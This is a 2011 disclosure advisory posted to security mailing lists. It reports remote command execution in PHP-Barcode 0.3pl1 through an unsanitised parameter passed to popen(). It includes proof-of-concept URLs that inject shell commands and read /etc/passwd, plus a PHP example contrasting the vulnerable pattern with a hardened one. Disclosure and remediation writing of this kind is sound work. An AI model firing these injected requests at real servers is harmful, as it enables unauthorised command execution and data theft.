Message-ID: <CA+FRxekFU71ERPAuHd1kWM_DM5_O38=PPnQTk4z9F6FJ6pqrKQ@mail.gmail.com>
Date: Mon, 25 Jul 2011 18:03:24 -0500
From: beford <xbefordx@...il.com>
To: bugs@...uritytracker.com, bugtraq@...urityfocus.com
Subject: PHP-Barcode 0.3pl1 Remote Code Execution

PHP-Barcode 0.3pl1 Remote Code Execution
========================================

The value of the code parameter is not sanitized before it is interpolated
into a shell command passed to popen(). This allows remote command
execution and also exposes environment variables:

Windows

http://www.site.com/php-barcode/barcode.php?code=%TMP%

Linux

http://www.site.com/php-barcode/barcode.php?code=012$PATH$d
http://www.site.com/php-barcode/barcode.php?code=`uname%20-a`
http://www.site.com/php-barcode/barcode.php?code=`tail%20-1%20/etc/passwd`
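
Added illustration of the fix, not php-barcode's own code: the popen() pattern the advisory describes next to a hardened handler. The genbarcode helper name, its argument order and the digits-only allowlist are assumptions for illustration.

```php
<?php
// Added example (not php-barcode's own code). "genbarcode" and its
// argument order are assumed for illustration.

// VULNERABLE: the raw query parameter is interpolated into a shell command
// line, so `cmd`, $VAR and %VAR% are expanded by the shell before
// genbarcode ever sees the value.
function render_unsafe(string $code): string
{
    $fp  = popen("genbarcode \"$code\" EAN", 'r');   // do not use
    $out = stream_get_contents($fp);
    pclose($fp);
    return $out;
}

// HARDENED: validate against an allowlist first, then keep the value away
// from any shell entirely.
function render_safe(string $code): string
{
    // 1. Accept only what a barcode payload may legitimately contain.
    //    EAN/UPC payloads are digits; widen deliberately if other symbologies
    //    are needed, never to "anything but a few metacharacters".
    if (!preg_match('/^[0-9]{8,14}$/', $code)) {
        throw new InvalidArgumentException('invalid barcode value');
    }

    // 2. proc_open() with an array command (PHP >= 7.4) executes the program
    //    directly, no /bin/sh involved, so the value is one literal argv
    //    element whatever bytes it contains.
    $spec  = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc  = proc_open(['genbarcode', $code, 'EAN'], $spec, $pipes);
    if ($proc === false) {
        throw new RuntimeException('failed to start genbarcode');
    }
    fclose($pipes[0]);
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    if (proc_close($proc) !== 0) {
        throw new RuntimeException('genbarcode failed');
    }
    return $out;
}

// On PHP < 7.4 use a string command wrapped with escapeshellarg() after the
// same allowlist check; escapeshellarg() alone is not a substitute for it.
header('Content-Type: text/plain');
echo render_safe($_GET['code'] ?? '');
```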

Vendor:
 http://www.ashberg.de/php-barcode/download/

Vendor informed:
 July  6 / 2011

Vendor acknowledgement:
 July 7 / 2011

Fix not available from vendor.

- beford
